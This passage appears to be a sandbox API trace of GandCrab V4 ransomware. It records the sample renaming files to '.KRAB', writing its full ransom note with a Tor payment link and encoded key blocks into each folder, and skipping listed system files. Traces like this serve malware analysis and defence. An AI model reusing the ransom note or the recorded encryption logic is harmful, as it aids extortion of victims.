lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0062.035] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.041] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.042] CloseHandle (hObject=0x440) returned 1 [0062.045] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.046] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\synchist"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\synchist.krab")) returned 1 [0062.046] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.047] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0062.047] FindClose (in: hFindFile=0xfbd1e0 | out: hFindFile=0xfbd1e0) returned 1 [0062.047] CloseHandle (hObject=0x3ac) returned 1 [0062.047] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0062.047] lstrcmpW (lpString1="Publisher", lpString2=".") returned 1 [0062.047] lstrcmpW (lpString1="Publisher", lpString2="..") returned 1 [0062.047] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Publisher" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher" [0062.047] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\" [0062.047] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0062.048] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0062.048] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0062.048] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0062.048] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0062.048] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.048] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.049] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\\\KRAB-DECRYPT.txt") returned 75 [0062.049] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\publisher\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0062.049] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0062.049] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0062.050] CloseHandle (hObject=0x3ac) returned 1 [0062.050] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.051] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.051] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x9, wMilliseconds=0xf3)) [0062.051] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.051] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0062.051] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0062.052] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\d2ca4a08d2ca4dee3d.lock") returned 81 [0062.053] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\publisher\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0062.053] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.054] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.054] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\") returned 58 [0062.054] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\*" [0062.054] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd1e0 [0062.054] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.054] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0062.054] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0062.054] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.054] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0062.054] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0062.054] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0062.054] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\d2ca4a08d2ca4dee3d.lock" [0062.057] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.057] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 86 [0062.057] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\d2ca4a08d2ca4dee3d.lock") returned 81 [0062.058] lstrlenW (lpString=".lock") returned 5 [0062.058] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.058] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0062.058] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.058] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.058] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0062.059] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0062.059] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0062.059] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\KRAB-DECRYPT.txt" [0062.059] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.059] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\KRAB-DECRYPT.txt.KRAB") returned 79 [0062.059] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\KRAB-DECRYPT.txt") returned 74 [0062.059] lstrlenW (lpString=".txt") returned 4 [0062.059] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.059] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0062.059] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.060] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\KRAB-DECRYPT.txt") returned 74 [0062.060] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\KRAB-DECRYPT.txt") returned 74 [0062.060] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0062.060] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0062.060] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0062.060] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0062.060] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0062.060] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0062.060] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0062.060] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0062.060] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0062.060] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0062.060] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.060] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0062.060] FindClose (in: hFindFile=0xfbd1e0 | out: hFindFile=0xfbd1e0) returned 1 [0062.061] CloseHandle (hObject=0x3ac) returned 1 [0062.061] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0062.061] lstrcmpW (lpString1="Publisher Building Blocks", lpString2=".") returned 1 [0062.061] lstrcmpW (lpString1="Publisher Building Blocks", lpString2="..") returned 1 [0062.061] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Publisher Building Blocks" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks" [0062.061] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\" [0062.061] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0062.062] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0062.062] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0062.062] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0062.062] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0062.062] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.062] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.062] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\\\KRAB-DECRYPT.txt") returned 91 [0062.062] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\publisher building blocks\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0062.063] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0062.063] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0062.064] CloseHandle (hObject=0x3ac) returned 1 [0062.064] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.064] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.065] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: 